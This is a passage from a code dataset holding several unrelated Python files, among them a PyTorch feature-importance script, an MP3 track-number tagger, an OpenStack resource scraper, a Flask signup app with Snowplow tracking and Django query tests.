self.my_tree.GetListOfBranches() ]\n \n def __getitem__(self, idx):\n self.my_tree.GetEntry(idx)\n truth = torch.tensor( [ getattr( self.my_tree, name ) for name in self.branch_names[1:3] ], dtype=torch.float32 )\n recon = torch.tensor( [ getattr( self.my_tree, name ) for name in self.branch_names[4:] ], dtype=torch.float32 )\n return recon, truth\n \n def __len__(self):\n return self.n_events\n\ndef main(): \n \n ####### ADJUSTABLE PARAMETERS ########\n network_base_dir = \"/home/matthew/Documents/Masters/Met_network/Networks/Saved_Networks/\"\n stats_base_dir = \"/home/matthew/Documents/Masters/Met_network/Data/Training/\"\n data_base_dir = \"/home/matthew/Documents/Masters/Met_network/Data/Evaluation/\"\n \n network_name = \"NonZero_Swish_5x1000_AM_L1_AA_XY_5e-06_Drop2\"\n activated_ann = mn.AMANNDA( \"Swish\", 5, 1000, 0.2, \"XY\", False ) # ( act, depth, width, dropout_p, out_type, btchnorm )\n stats_file = \"nonzero_data_stats.csv\"\n \n data_set_name = \"combined_evaluation.root\"\n \n real = 0\n n_events = 1 # None = all\n mini_batch_size = 1\n loss_fn = nn.MSELoss( reduction = \"mean\" )\n \n output_dir = \"Plots/{}/{}\".format(network_name,data_set_name[:-5])\n ######################################\n\n\n ########## The Neural Network is Loaded ##########\n activated_ann.load_state_dict(torch.load( network_base_dir + network_name + \"/network_model_optimal\" ) )\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n activated_ann = activated_ann.to(device)\n activated_ann.eval()\n\n\n ########## Loading normalisation data ##########\n stats_data = pd.read_csv( os.path.join( stats_base_dir, stats_file ), header = None ) \n means = torch.as_tensor( stats_data.iloc[1, 4:].values.astype(np.float32) )\n stdevs = torch.as_tensor( stats_data.iloc[2, 4:].values.astype(np.float32) )\n means = means.to(device)\n stdevs = stdevs.to(device)\n \n\n ########## Getting data from the files ##########\n data_set = RootDataSet( data_base_dir, data_set_name, n_events, real )\n data_loader = DataLoader( data_set, batch_size = mini_batch_size, num_workers = 1 )\n\n\n ######## Creating gradient containers which will convey importance ########\n average_gradients = torch.zeros( 63 )\n average_gradients = average_gradients.to( device )\n \n for batch_idx, (recon, truth) in enumerate( data_loader ):\n \n ## We first pass the batch onto the GPU\n recon = recon.to( device )\n truth = truth.to( device )\n \n ## The batch is then normalised together\n norm_recon = torch.div( ( recon - means ), stdevs )\n norm_recon.requires_grad_(True)\n \n ## The batch is passed through the network\n output = activated_ann( norm_recon )\n dummy = torch.zeros( output.size(), device = device )\n \n ## We split it into x and y values\n output_split = output.split( 1, dim=1 )\n output_x_values = output_split[0]\n output_y_values = output_split[1]\n \n truth_split = dummy.split( 1, dim=1 )\n truth_x_values = truth_split[0]\n truth_y_values = truth_split[1]\n \n ## Now we calculate the x gradients\n x_loss = loss_fn( output_x_values, truth_x_values )\n x_loss.backward( retain_graph=True )\n x_gradients = norm_recon.grad.abs()\n x_batch_gradients = x_gradients.mean(0)\n average_gradients += x_batch_gradients\n norm_recon.grad.data.zero_()\n \n ## Now we calculate the y gradients\n y_loss = loss_fn( output_y_values, truth_y_values )\n y_loss.backward( retain_graph=True )\n y_gradients = norm_recon.grad.abs()\n y_batch_gradients = y_gradients.mean(0)\n average_gradients += y_batch_gradients\n norm_recon.grad.data.zero_()\n \n print(\"Completed {}/{} \\r\".format(batch_idx, len(data_loader)), end=\"\" )\n sys.stdout.flush()\n print(\"Completed {}/{} \\n\".format(len(data_loader), len(data_loader)) )\n \n ## Copying data back to cpu\n average_gradients = average_gradients.cpu().numpy()\n average_gradients = average_gradients / average_gradients.max()\n \n ## Calculating the most important names\n indicies = average_gradients.argsort()[::-1]\n recon_names = data_set.branch_names[4:]\n ordered_names = [ recon_names[i] for i in indicies ]\n ordered_gradients = [ average_gradients[i] for i in indicies ]\n \n ## Plotting the bar graph of the top ten\n fig = plt.figure( figsize = (6,6) )\n ax_imprt = fig.add_subplot( 1 , 1 , 1 )\n \n number_to_show = 10\n x = np.arange(number_to_show)[::-1]\n \n ax_imprt.set_xlabel('Relative Importance')\n ax_imprt.barh( x, ordered_gradients[:number_to_show] )\n ax_imprt.set_yticks( x )\n ax_imprt.set_yticklabels( ordered_names[:number_to_show] )\n \n if not os.path.exists(output_dir):\n os.system(\"mkdir -p \" + output_dir)\n \n output_file = \"{}/Importance_def.svg\".format(output_dir)\n plt.title(\"Top 10 Variables\")\n plt.tight_layout()\n plt.savefig(output_file)\n \n \n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n","repo_name":"mattcleigh/Masters","sub_path":"Third_Stage/Run/Evaluation/Importance.py","file_name":"Importance.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27848871580","text":"#!/usr/bin/env python3\n\n# Written by Gem Newman. This work is licensed under the MIT License.\n\n\nfrom argparse import ArgumentParser\nfrom mutagen.easyid3 import EasyID3\nimport re, os\n\n\nPATTERN = r'^(\\d+).*\\.mp3'\np = re.compile(PATTERN)\n\n\ndef main():\n parser = ArgumentParser(\n description='Adds (or overwrites) the ID3 track number in any MP3 file'\n 'with a file name beginning with a number.')\n parser.add_argument(\"dir\", nargs='?', default='.',\n help='The directory to process. Defaults to \".\".')\n parser.add_argument(\"--file\", '-f', nargs='?', help='If provided, '\n 'processes a single file instead of the specified directory.')\n parser.add_argument(\"--verbose\", '-v', action='store_true')\n args = parser.parse_args()\n\n if args.file:\n files = [args.file]\n else:\n # List all files in the dir\n files = os.listdir(args.dir)\n\n # Filter to only those that match the pattern\n files = list(filter(p.match, files))\n\n for file in files:\n if args.verbose:\n print(file)\n\n track = int(p.match(file).group(1))\n\n if not track > 0:\n if args.verbose:\n print(f'Skipping invalid track number: {track}')\n continue\n\n # Append full path for files (since listdir only returns the filename)\n if not args.file:\n file = os.path.join(args.dir, file)\n\n audio = EasyID3(file)\n audio['tracknumber'] = str(track)\n audio.save()\n\n if args.verbose:\n print('Done')\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"spurll/tracknum","sub_path":"tracknum.py","file_name":"tracknum.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26879987284","text":"from typing import List\nfrom functools import lru_cache\n\n# Definition for a binary tree node.\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def deep_clone(self, tree: TreeNode) -> TreeNode:\n \"\"\" Similar to deep copy \"\"\"\n if not tree:\n return None\n new_tree = TreeNode(0)\n new_tree.left = self.deep_clone(tree.left)\n new_tree.right = self.deep_clone(tree.right)\n return new_tree\n\n @lru_cache(None)\n def allPossibleFBT(self, N: int) -> List[TreeNode]:\n \"\"\"\n if N = 7,\n think of the nodes as 1, 2, 3, 4, 5, 6, 7\n Even values cannot be lead nodes\n and all Odd values are leaf nodes\n \"\"\"\n if not(N & 1):\n return []\n elif N == 1:\n return [TreeNode(0)]\n rtn = []\n\n for i in range(2, N + 1, 2):\n left_branch = self.allPossibleFBT(i - 1)\n right_branch = self.allPossibleFBT(N - i)\n for left_count, left in enumerate(left_branch, 1):\n for right_count, right in enumerate(right_branch, 1):\n tree = TreeNode(0)\n\n tree.left = self.deep_clone(\n left) if right_count < len(right_branch) else left\n tree.right = self.deep_clone(\n right) if left_count < len(left_branch) else right\n\n rtn.append(tree)\n return rtn\n\n\n\"\"\"\nRuntime: 264 ms, faster than 38.88% of Python3 online submissions for All Possible Full Binary Trees.\nMemory Usage: 21.9 MB, less than 42.86% of Python3 online submissions for All Possible Full Binary Trees.\n\"\"\"\n","repo_name":"SamSamhuns/wallbreakers_projekts","sub_path":"Leetcode/week_4/p0894_all_possible_full_binary_trees.py","file_name":"p0894_all_possible_full_binary_trees.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"27043496336","text":"import pygame as pg\nimport pygame_gui as pgg\nfrom . import themes, window, gui, gui_definitions as gd\n\n\ndef main():\n done = False\n pg.init()\n window.init()\n themes.set_current_theme(\"dark_mode\")\n is_black = True\n current_gui = gui.generate(gd.menu_gui)\n\n def flip_theme():\n nonlocal is_black\n if is_black:\n themes.set_current_theme(\"light_mode\")\n else:\n themes.set_current_theme(\"dark_mode\")\n is_black = not is_black\n\n while not done:\n for ev in pg.event.get():\n gui.handle_event(ev)\n if ev.type == pg.QUIT:\n done = True\n elif ev.type == pg.KEYDOWN:\n if ev.key == pg.K_SPACE:\n pass\n elif ev.type == pgg.UI_BUTTON_PRESSED:\n if ev.ui_element is current_gui.quit:\n done = True\n elif ev.ui_element is current_gui.open:\n current_gui = gui.generate(gd.open_gui)\n elif ev.ui_element is current_gui.back:\n current_gui = gui.generate(gd.menu_gui)\n\n window.window.fill((0, 0, 0) if is_black else (255, 255, 255))\n\n gui.draw(window.window)\n gui.update()\n window.update()\n","repo_name":"gresm/cpaste_game_engine","sub_path":"editor/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27231153331","text":"import copy\nimport os\nfrom concurrent.futures import ThreadPoolExecutor\nfrom threading import Lock\nfrom typing import List, Optional\n\nfrom logger import logger\nfrom models.provider import (\n AuthMethod,\n Openstack,\n PrivateNetProxy,\n Project,\n TrustedIDP,\n)\nfrom openstack import connect\nfrom openstack.connection import Connection\n\nfrom app.provider.enum import ProviderStatus\nfrom app.provider.schemas_extended import (\n BlockStorageQuotaCreateExtended,\n BlockStorageServiceCreateExtended,\n ComputeQuotaCreateExtended,\n ComputeServiceCreateExtended,\n FlavorCreateExtended,\n IdentityServiceCreate,\n ImageCreateExtended,\n NetworkCreateExtended,\n NetworkQuotaCreateExtended,\n NetworkServiceCreateExtended,\n ProjectCreate,\n ProviderCreateExtended,\n RegionCreateExtended,\n SLACreateExtended,\n UserGroupCreateExtended,\n)\nfrom app.service.enum import (\n BlockStorageServiceName,\n ComputeServiceName,\n IdentityServiceName,\n NetworkServiceName,\n)\n\nTIMEOUT = 2 # s\n\nprojects_lock = Lock()\nregion_lock = Lock()\n\n\ndef get_block_storage_quotas(conn: Connection) -> BlockStorageQuotaCreateExtended:\n logger.info(\"Retrieve current project accessible block storage quotas\")\n quota = conn.block_storage.get_quota_set(conn.current_project_id)\n data = quota.to_dict()\n logger.debug(f\"Block storage service quotas={data}\")\n return BlockStorageQuotaCreateExtended(**data, project=conn.current_project_id)\n\n\ndef get_compute_quotas(conn: Connection) -> ComputeQuotaCreateExtended:\n logger.info(\"Retrieve current project accessible compute quotas\")\n quota = conn.compute.get_quota_set(conn.current_project_id)\n data = quota.to_dict()\n logger.debug(f\"Compute service quotas={data}\")\n return ComputeQuotaCreateExtended(**data, project=conn.current_project_id)\n\n\ndef get_network_quotas(conn: Connection) -> NetworkQuotaCreateExtended:\n logger.info(\"Retrieve current project accessible network quotas\")\n quota = conn.network.get_quota(conn.current_project_id)\n data = quota.to_dict()\n data[\"public_ips\"] = data.pop(\"floating_ips\")\n logger.debug(f\"Network service quotas={data}\")\n return NetworkQuotaCreateExtended(**data, project=conn.current_project_id)\n\n\ndef get_flavors(conn: Connection) -> List[FlavorCreateExtended]:\n logger.info(\"Retrieve current project accessible flavors\")\n flavors = []\n for flavor in conn.compute.flavors(is_disabled=False):\n logger.debug(f\"Flavor received data={flavor!r}\")\n projects = []\n if not flavor.is_public:\n for i in conn.compute.get_flavor_access(flavor):\n projects.append(i.get(\"tenant_id\"))\n data = flavor.to_dict()\n data[\"uuid\"] = data.pop(\"id\")\n if data.get(\"description\") is None:\n data[\"description\"] = \"\"\n extra = data.pop(\"extra_specs\")\n if extra:\n data[\"gpus\"] = int(extra.get(\"gpu_number\", 0))\n data[\"gpu_model\"] = extra.get(\"gpu_model\") if data[\"gpus\"] > 0 else None\n data[\"gpu_vendor\"] = extra.get(\"gpu_vendor\") if data[\"gpus\"] > 0 else None\n data[\"local_storage\"] = extra.get(\n \"aggregate_instance_extra_specs:local_storage\"\n )\n data[\"infiniband\"] = extra.get(\"infiniband\", False)\n logger.debug(f\"Flavor manipulated data={data}\")\n flavors.append(FlavorCreateExtended(**data, projects=projects))\n return flavors\n\n\ndef get_images(\n conn: Connection, tags: Optional[List[str]] = None\n) -> List[ImageCreateExtended]:\n if tags is None:\n tags = []\n logger.info(\"Retrieve current project accessible images\")\n images = []\n for image in conn.image.images(\n status=\"active\", tag=None if len(tags) == 0 else tags\n ):\n logger.debug(f\"Image received data={image!r}\")\n is_public = True\n projects = []\n if image.visibility in [\"private\", \"shared\"]:\n projects = [image.owner_id]\n is_public = False\n if image.visibility == \"shared\":\n members = list(conn.image.members(image))\n for member in members:\n if member.status == \"accepted\":\n projects.append(member.id)\n data = image.to_dict()\n data[\"uuid\"] = data.pop(\"id\")\n if data.get(\"description\") is None:\n data[\"description\"] = \"\"\n data[\"is_public\"] = is_public\n logger.debug(f\"Image manipulated data={data}\")\n images.append(ImageCreateExtended(**data, projects=projects))\n return images\n\n\ndef get_networks(\n conn: Connection,\n default_private_net: Optional[str] = None,\n default_public_net: Optional[str] = None,\n proxy: Optional[PrivateNetProxy] = None,\n tags: Optional[List[str]] = None,\n) -> List[NetworkCreateExtended]:\n if tags is None:\n tags = []\n logger.info(\"Retrieve current project accessible networks\")\n networks = []\n for network in conn.network.networks(\n status=\"active\", tag=None if len(tags) == 0 else tags\n ):\n logger.debug(f\"Network received data={network!r}\")\n project = None\n if not network.is_shared:\n project = conn.current_project_id\n data = network.to_dict()\n data[\"uuid\"] = data.pop(\"id\")\n if data.get(\"description\") is None:\n data[\"description\"] = \"\"\n if data.get(\"is_default\") is None:\n if (network.is_shared and default_public_net == network.name) or (\n not network.is_shared and default_private_net == network.name\n ):\n data[\"is_default\"] = True\n else:\n data[\"is_default\"] = False\n if proxy is not None:\n data[\"proxy_ip\"] = proxy.ip\n data[\"proxy_user\"] = proxy.user\n logger.debug(f\"Network manipulated data={data}\")\n networks.append(NetworkCreateExtended(**data, project=project))\n return networks\n\n\ndef get_project(conn: Connection) -> ProjectCreate:\n logger.info(\"Retrieve current project data\")\n project = conn.identity.get_project(conn.current_project_id)\n logger.debug(f\"Project received data={project!r}\")\n data = project.to_dict()\n data[\"uuid\"] = data.pop(\"id\")\n if data.get(\"description\") is None:\n data[\"description\"] = \"\"\n logger.debug(f\"Project manipulated data={data}\")\n return ProjectCreate(**data)\n\n\ndef get_correct_idp_and_user_group_for_project(\n *,\n trusted_idps: List[TrustedIDP],\n os_conf_auth_methods: List[AuthMethod],\n project_conf: Project,\n) -> TrustedIDP:\n for trusted_idp in trusted_idps:\n for user_group in trusted_idp.user_groups:\n for sla in user_group.slas:\n if sla.doc_uuid == project_conf.sla:\n if project_conf.id not in sla.projects:\n sla.projects.append(project_conf.id)\n for auth_method in os_conf_auth_methods:\n if auth_method.endpoint == trusted_idp.endpoint:\n trusted_idp.relationship = auth_method\n return trusted_idp\n return trusted_idp\n\n logger.error(\n \"Configuration error: No matching Identity Provider \"\n f\"for project {project_conf.id}\"\n )\n raise\n\n\ndef get_per_project_details(\n os_conf: Openstack,\n project_conf: Project,\n region: RegionCreateExtended,\n trusted_idps: List[TrustedIDP],\n projects: List[ProjectCreate],\n) -> None:\n default_private_net = project_conf.default_private_net\n default_public_net = project_conf.default_public_net\n proxy = project_conf.private_net_proxy\n per_user_limits = project_conf.per_user_limits\n region_props = next(\n filter(\n lambda x: x.region_name == region.name,\n project_conf.per_region_props,\n ),\n None,\n )\n\n if region_props is not None:\n default_private_net = region_props.default_private_net\n default_public_net = region_props.default_public_net\n proxy = region_props.private_net_proxy\n per_user_limits = region_props.per_user_limits\n\n trusted_idp = get_correct_idp_and_user_group_for_project(\n os_conf_auth_methods=os_conf.identity_providers,\n trusted_idps=trusted_idps,\n project_conf=project_conf,\n )\n if trusted_idp is None:\n logger.error(f\"Skipping project {project_conf.id}.\")\n return\n\n logger.info(\n f\"Connecting through IDP {trusted_idp.endpoint} to openstack \"\n f\"'{os_conf.name}' and region '{region.name}'. \"\n f\"Accessing with project ID: {project_conf.id}\"\n )\n conn = connect(\n auth_url=os_conf.auth_url,\n auth_type=\"v3oidcaccesstoken\",\n identity_provider=trusted_idp.relationship.idp_name,\n protocol=trusted_idp.relationship.protocol,\n access_token=trusted_idp.token,\n project_id=project_conf.id,\n region_name=region.name,\n timeout=TIMEOUT,\n )\n logger.info(\"Connected.\")\n\n # Create region's compute service.\n # Retrieve flavors, images and current project corresponding quotas.\n # Add them to the compute service.\n compute_service = ComputeServiceCreateExtended(\n endpoint=conn.compute.get_endpoint(), name=ComputeServiceName.OPENSTACK_NOVA\n )\n compute_service.flavors = get_flavors(conn)\n compute_service.images = get_images(conn, tags=os_conf.image_tags)\n compute_service.quotas = [get_compute_quotas(conn)]\n if per_user_limits is not None and per_user_limits.compute is not None:\n compute_service.quotas.append(\n ComputeQuotaCreateExtended(\n **per_user_limits.compute.dict(exclude_none=True),\n project=project_conf.id,\n )\n )\n\n with region_lock:\n for i, region_service in enumerate(region.compute_services):\n if region_service.endpoint == compute_service.endpoint:\n uuids = [j.uuid for j in region_service.flavors]\n region.compute_services[i].flavors += list(\n filter(lambda x: x.uuid not in uuids, compute_service.flavors)\n )\n uuids = [j.uuid for j in region_service.images]\n region.compute_services[i].images += list(\n filter(lambda x: x.uuid not in uuids, compute_service.images)\n )\n region.compute_services[i].quotas += compute_service.quotas\n break\n else:\n region.compute_services.append(compute_service)\n\n # Retrieve project's block storage service.\n # Remove last part which corresponds to the project ID.\n # Retrieve current project corresponding quotas.\n # Add them to the block storage service.\n endpoint = conn.block_storage.get_endpoint()\n endpoint = os.path.dirname(endpoint)\n block_storage_service = BlockStorageServiceCreateExtended(\n endpoint=endpoint, name=BlockStorageServiceName.OPENSTACK_CINDER\n )\n block_storage_service.quotas = [get_block_storage_quotas(conn)]\n if per_user_limits is not None and per_user_limits.block_storage is not None:\n block_storage_service.quotas.append(\n BlockStorageQuotaCreateExtended(\n **per_user_limits.block_storage.dict(exclude_none=True),\n project=project_conf.id,\n )\n )\n\n with region_lock:\n for i, region_service in enumerate(region.block_storage_services):\n if region_service.endpoint == block_storage_service.endpoint:\n region.block_storage_services[i].quotas += block_storage_service.quotas\n break\n else:\n region.block_storage_services.append(block_storage_service)\n\n # Retrieve region's network service.\n network_service = NetworkServiceCreateExtended(\n endpoint=conn.network.get_endpoint(),\n name=NetworkServiceName.OPENSTACK_NEUTRON,\n )\n network_service.networks = get_networks(\n conn,\n default_private_net=default_private_net,\n default_public_net=default_public_net,\n proxy=proxy,\n tags=os_conf.network_tags,\n )\n network_service.quotas = [get_network_quotas(conn)]\n if per_user_limits is not None and per_user_limits.network is not None:\n network_service.quotas.append(\n NetworkQuotaCreateExtended(\n **per_user_limits.compute.dict(exclude_none=True),\n project=project_conf.id,\n )\n )\n\n with region_lock:\n for i, region_service in enumerate(region.network_services):\n if region_service.endpoint == network_service.endpoint:\n uuids = [j.uuid for j in region_service.networks]\n region.network_services[i].networks += list(\n filter(lambda x: x.uuid not in uuids, network_service.networks)\n )\n break\n else:\n region.network_services.append(network_service)\n\n # Retrieve provider's identity service.\n identity_service = IdentityServiceCreate(\n endpoint=os_conf.auth_url,\n name=IdentityServiceName.OPENSTACK_KEYSTONE,\n )\n with region_lock:\n for region_service in region.identity_services:\n if region_service.endpoint == identity_service.endpoint:\n break\n else:\n region.identity_services.append(identity_service)\n\n # Create project entity\n project = get_project(conn)\n with projects_lock:\n if project.uuid not in [i.uuid for i in projects]:\n projects.append(project)\n\n conn.close()\n logger.info(\"Connection closed\")\n\n\ndef get_provider(\n *, os_conf: Openstack, trusted_idps: List[TrustedIDP]\n) -> ProviderCreateExtended:\n \"\"\"Generate an Openstack virtual provider, reading information from a real openstack\n instance.\n \"\"\"\n if os_conf.status != ProviderStatus.ACTIVE:\n logger.info(f\"Provider={os_conf.name} not active: {os_conf.status}\")\n return ProviderCreateExtended(\n name=os_conf.name,\n type=os_conf.type,\n is_public=os_conf.is_public,\n support_emails=os_conf.support_emails,\n status=os_conf.status,\n )\n\n trust_idps = copy.deepcopy(trusted_idps)\n regions: List[RegionCreateExtended] = []\n projects: List[ProjectCreate] = []\n\n for region_conf in os_conf.regions:\n region = RegionCreateExtended(**region_conf.dict())\n thread_pool = ThreadPoolExecutor(max_workers=len(os_conf.projects))\n for project_conf in os_conf.projects:\n thread_pool.submit(\n get_per_project_details,\n os_conf=os_conf,\n project_conf=project_conf,\n region=region,\n trusted_idps=trust_idps,\n projects=projects,\n )\n thread_pool.shutdown(wait=True)\n regions.append(region)\n\n # Filter on IDPs and user groups with SLAs\n # belonging to at least one project\n for idp in trust_idps:\n user_groups = []\n for user_group in idp.user_groups:\n for sla in user_group.slas:\n if len(sla.projects) == 1:\n project = sla.projects[0]\n new_sla = SLACreateExtended(**sla.dict(), project=project)\n new_group = UserGroupCreateExtended(\n **user_group.dict(), sla=new_sla\n )\n user_groups.append(new_group)\n idp.user_groups = user_groups\n identity_providers = list(filter(lambda idp: len(idp.user_groups) > 0, trust_idps))\n\n # Remove from flavors and images' projects the ones\n # that have not been imported in the CMDB\n projects_uuid = [i.uuid for i in projects]\n for region in regions:\n for service in region.compute_services:\n for flavor in service.flavors:\n flavor.projects = list(\n filter(lambda x: x in projects_uuid, flavor.projects)\n )\n for image in service.images:\n image.projects = list(\n filter(lambda x: x in projects_uuid, image.projects)\n )\n\n return ProviderCreateExtended(\n name=os_conf.name,\n type=os_conf.type,\n is_public=os_conf.is_public,\n support_emails=os_conf.support_emails,\n status=os_conf.status,\n identity_providers=identity_providers,\n projects=projects,\n regions=regions,\n )\n","repo_name":"giosava94/catalog-api","sub_path":"scripts/providers/opnstk.py","file_name":"opnstk.py","file_ext":"py","file_size_in_byte":16523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20838476027","text":"from flask import Flask, render_template, request, redirect\nfrom snowplow_tracker import Emitter, Tracker\nfrom snowplow_tracker import SelfDescribingJson\n\napp = Flask(__name__)\n\nemail_addresses = []\ne = Emitter(\"localhost:8080\")\nt = Tracker(e, namespace=\"python\", app_id=\"hello_bears\")\n\n\n@app.route('/emails', methods=['GET'])\ndef emails():\n t.track_self_describing_event(SelfDescribingJson(\n \"iglu:com.hellobears/email_addresses_viewed/jsonschema/1-0-0\",\n {\n \"test\": \"stewart\"\n }\n ))\n return render_template('emails.html', email_addresses=email_addresses)\n\n\n@app.route('/signup', methods=['POST'])\ndef signup():\n email = request.form['email']\n email_addresses.append(email)\n\n t.track_self_describing_event(SelfDescribingJson(\n \"iglu:com.hellobears/email_address_submitted/jsonschema/1-0-0\",\n {\n \"email_address\": email\n }\n ))\n return redirect('/')\n\n\n@app.route('/')\ndef hello_world():\n t.track_page_view(\"www.hellobears.com\", \"Index\")\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Kimblebrook/hello_bears","sub_path":"hello_flask.py","file_name":"hello_flask.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6307300465","text":"from datetime import datetime\n\nfrom django.core.exceptions import FieldError\nfrom django.db import DEFAULT_DB_ALIAS, connection\nfrom django.db.models import BooleanField, CharField, F, Q\nfrom django.db.models.expressions import (\n Col,\n Exists,\n ExpressionWrapper,\n Func,\n RawSQL,\n Value,\n)\nfrom django.db.models.fields.related_lookups import RelatedIsNull\nfrom django.db.models.functions import Lower\nfrom django.db.models.lookups import Exact, GreaterThan, IsNull, LessThan\nfrom django.db.models.sql.constants import SINGLE\nfrom django.db.models.sql.query import JoinPromoter, Query, get_field_names_from_opts\nfrom django.db.models.sql.where import AND, OR\nfrom django.test import SimpleTestCase, TestCase, skipUnlessDBFeature\nfrom django.test.utils import register_lookup\n\nfrom .models import Author, Item, ObjectC, Ranking\n\n\nclass TestQuery(SimpleTestCase):\n def test_simple_query(self):\n query = Query(Author)\n where = query.build_where(Q(num__gt=2))\n lookup = where.children[0]\n self.assertIsInstance(lookup, GreaterThan)\n self.assertEqual(lookup.rhs, 2)\n self.assertEqual(lookup.lhs.target, Author._meta.get_field(\"num\"))\n\n def test_non_alias_cols_query(self):\n query = Query(Author, alias_cols=False)\n where = query.build_where(Q(num__gt=2, name__isnull=False) | Q(num__lt=F(\"id\")))\n\n name_isnull_lookup, num_gt_lookup = where.children[0].children\n self.assertIsInstance(num_gt_lookup, GreaterThan)\n self.assertIsInstance(num_gt_lookup.lhs, Col)\n self.assertIsNone(num_gt_lookup.lhs.alias)\n self.assertIsInstance(name_isnull_lookup, IsNull)\n self.assertIsInstance(name_isnull_lookup.lhs, Col)\n self.assertIsNone(name_isnull_lookup.lhs.alias)\n\n num_lt_lookup = where.children[1]\n self.assertIsInstance(num_lt_lookup, LessThan)\n self.assertIsInstance(num_lt_lookup.rhs, Col)\n self.assertIsNone(num_lt_lookup.rhs.alias)\n self.assertIsInstance(num_lt_lookup.lhs, Col)\n self.assertIsNone(num_lt_lookup.lhs.alias)\n\n def test_complex_query(self):\n query = Query(Author)\n where = query.build_where(Q(num__gt=2) | Q(num__lt=0))\n self.assertEqual(where.connector, OR)\n\n lookup = where.children[0]\n self.assertIsInstance(lookup, GreaterThan)\n self.assertEqual(lookup.rhs, 2)\n self.assertEqual(lookup.lhs.target, Author._meta.get_field(\"num\"))\n\n lookup = where.children[1]\n self.assertIsInstance(lookup, LessThan)\n self.assertEqual(lookup.rhs, 0)\n self.assertEqual(lookup.lhs.target, Author._meta.get_field(\"num\"))\n\n def test_multiple_fields(self):\n query = Query(Item, alias_cols=False)\n where = query.build_where(Q(modified__gt=F(\"created\")))\n lookup = where.children[0]\n self.assertIsInstance(lookup, GreaterThan)\n self.assertIsInstance(lookup.rhs, Col)\n self.assertIsNone(lookup.rhs.alias)\n self.assertIsInstance(lookup.lhs, Col)\n self.assertIsNone(lookup.lhs.alias)\n self.assertEqual(lookup.rhs.target, Item._meta.get_field(\"created\"))\n self.assertEqual(lookup.lhs.target, Item._meta.get_field(\"modified\"))\n\n def test_transform(self):\n query = Query(Author, alias_cols=False)\n with register_lookup(CharField, Lower):\n where = query.build_where(~Q(name__lower=\"foo\"))\n lookup = where.children[0]\n self.assertIsInstance(lookup, Exact)\n self.assertIsInstance(lookup.lhs, Lower)\n self.assertIsInstance(lookup.lhs.lhs, Col)\n self.assertIsNone(lookup.lhs.lhs.alias)\n self.assertEqual(lookup.lhs.lhs.target, Author._meta.get_field(\"name\"))\n\n def test_negated_nullable(self):\n query = Query(Item)\n where = query.build_where(~Q(modified__lt=datetime(2017, 1, 1)))\n self.assertTrue(where.negated)\n lookup = where.children[0]\n self.assertIsInstance(lookup, LessThan)\n self.assertEqual(lookup.lhs.target, Item._meta.get_field(\"modified\"))\n lookup = where.children[1]\n self.assertIsInstance(lookup, IsNull)\n self.assertEqual(lookup.lhs.target, Item._meta.get_field(\"modified\"))\n\n def test_foreign_key(self):\n query = Query(Item)\n msg = \"Joined field references are not permitted in this query\"\n with self.assertRaisesMessage(FieldError, msg):\n query.build_where(Q(creator__num__gt=2))\n\n def test_foreign_key_f(self):\n query = Query(Ranking)\n with self.assertRaises(FieldError):\n query.build_where(Q(rank__gt=F(\"author__num\")))\n\n def test_foreign_key_exclusive(self):\n query = Query(ObjectC, alias_cols=False)\n where = query.build_where(Q(objecta=None) | Q(objectb=None))\n a_isnull = where.children[0]\n self.assertIsInstance(a_isnull, RelatedIsNull)\n self.assertIsInstance(a_isnull.lhs, Col)\n self.assertIsNone(a_isnull.lhs.alias)\n self.assertEqual(a_isnull.lhs.target, ObjectC._meta.get_field(\"objecta\"))\n b_isnull = where.children[1]\n self.assertIsInstance(b_isnull, RelatedIsNull)\n self.assertIsInstance(b_isnull.lhs, Col)\n self.assertIsNone(b_isnull.lhs.alias)\n self.assertEqual(b_isnull.lhs.target, ObjectC._meta.get_field(\"objectb\"))\n\n def test_clone_select_related(self):\n query = Query(Item)\n query.add_select_related([\"creator\"])\n clone = query.clone()\n clone.add_select_related([\"note\", \"creator__extra\"])\n self.assertEqual(query.select_related, {\"creator\": {}})\n\n def test_iterable_lookup_value(self):\n query = Query(Item)\n where = query.build_where(Q(name=[\"a\", \"b\"]))\n name_exact = where.children[0]\n self.assertIsInstance(name_exact, Exact)\n self.assertEqual(name_exact.rhs, \"['a', 'b']\")\n\n def test_filter_conditional(self):\n query = Query(Item)\n where = query.build_where(Func(output_field=BooleanField()))\n exact = where.children[0]\n self.assertIsInstance(exact, Exact)\n self.assertIsInstance(exact.lhs, Func)\n self.assertIs(exact.rhs, True)\n\n def test_filter_conditional_join(self):\n query = Query(Item)\n filter_expr = Func(\"note__note\", output_field=BooleanField())\n msg = \"Joined field references are not permitted in this query\"\n with self.assertRaisesMessage(FieldError, msg):\n query.build_where(filter_expr)\n\n def test_filter_non_conditional(self):\n query = Query(Item)\n msg = \"Cannot filter against a non-conditional expression.\"\n with self.assertRaisesMessage(TypeError, msg):\n query.build_where(Func(output_field=CharField()))\n\n\nclass TestQueryNoModel(TestCase):\n def test_rawsql_annotation(self):\n query = Query(None)\n sql = \"%s = 1\"\n # Wrap with a CASE WHEN expression if a database backend (e.g. Oracle)\n # doesn't support boolean expression in SELECT list.\n if not connection.features.supports_boolean_expr_in_select_clause:\n sql = f\"CASE WHEN {sql} THEN 1 ELSE 0 END\"\n query.add_annotation(RawSQL(sql, (1,), BooleanField()), \"_check\")\n result = query.get_compiler(using=DEFAULT_DB_ALIAS).execute_sql(SINGLE)\n 